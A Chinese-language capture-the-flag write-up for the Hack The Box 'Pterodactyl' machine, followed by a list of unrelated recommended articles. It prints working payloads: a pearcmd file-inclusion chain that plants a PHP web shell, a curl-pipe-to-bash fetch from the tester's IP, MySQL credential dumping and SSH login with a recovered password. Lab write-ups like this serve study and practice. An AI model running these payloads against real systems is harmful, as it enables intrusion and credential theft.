HTB 赛季10 - Pterodactyl - user

瘾大侠2026-02-13 9:58
复制代码 
10.129.16.212

nmap扫描

复制代码 
sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

![[Pasted image 20260208171012.png]]

http://pterodactyl.htb/changelog.txt

![[Pasted image 20260208171809.png]]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

复制代码 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

![[Pasted image 20260208172226.png]]

![[Pasted image 20260208172440.png]]

我们了解到这个漏洞存在,经过大量尝试,我们发现该漏洞是一种php文件包含的变种,他包含了pearcmd后,导致了RCE。我的payload如下

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

![[Pasted image 20260208183251.png]]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

![[Pasted image 20260208183309.png]]

我们开始反连

复制代码 
/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php

![[Pasted image 20260208183354.png]]

复制代码 
/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

![[Pasted image 20260208183543.png]]

![[Pasted image 20260208183627.png]]

上linpeas

复制代码 
wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

![[Pasted image 20260208184031.png]]

喷洒密码,没有用

复制代码 
PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

![[Pasted image 20260208190605.png]]

![[Pasted image 20260208191849.png]]

复制代码 
ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

![[Pasted image 20260208191631.png]]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞,但是我始终没能根据描述完成攻击。

相关推荐
会周易的程序员2 小时前
openplc runtime v4 安全
网络·c++·物联网·websocket·安全·https·ssl
加农炮手Jinx2 小时前
Flutter for OpenHarmony 实战:network_info_plus 网络扫描与隐私合规深度适配
网络·flutter·华为·harmonyos·鸿蒙
Geoking.2 小时前
SPI 与 API 的区别详解
网络
Whoami!2 小时前
⓬⁄₃ ⟦ OSCP ⬖ 研记 ⟧ Linux权限提升 ➱ Linux系统枚举-Ⅲ
网络安全·信息安全·linux枚举
Loqate地址智能2 小时前
机器学习如何破解全球欺诈工业化?实时检测+设备智能识别,反欺诈技术实操方案
大数据·人工智能·安全·机器学习
专注VB编程开发20年2 小时前
PLC协议:Modbus.Device(NModbus4)和手动 Socket.BeginConnect (APM异步编程模型)对比
网络·网络协议·tcp/ip·plc
济6172 小时前
I.MX6U 开发板网络环境搭建---- TFTP 环境搭建-- Ubuntu20.04
linux·网络·驱动开发
vx-bot5556662 小时前
企业微信ipad协议的回调安全机制与加解密实现
安全·企业微信·ipad
JasonSJX2 小时前
海海软件正式发布全新 DRM-X官网 Next.js 重构、多语言升级与 SEO 优化,助力全球数字版权保护
开发语言·javascript·安全·重构·视频防录屏·开源drm·加密保护课程
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03243 行 microGPT:把“训练 + 推理”拆到骨头里04UV安装并设置国内源05openclaw配置教程(linux+局域网ollama)06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07Linux下V2Ray安装配置指南08半小时搞定GitHub学生认证09爬虫逆向之观安(观镜WEB应用安全防护系统)10【软考经验分享】软考-中级-嵌入式备考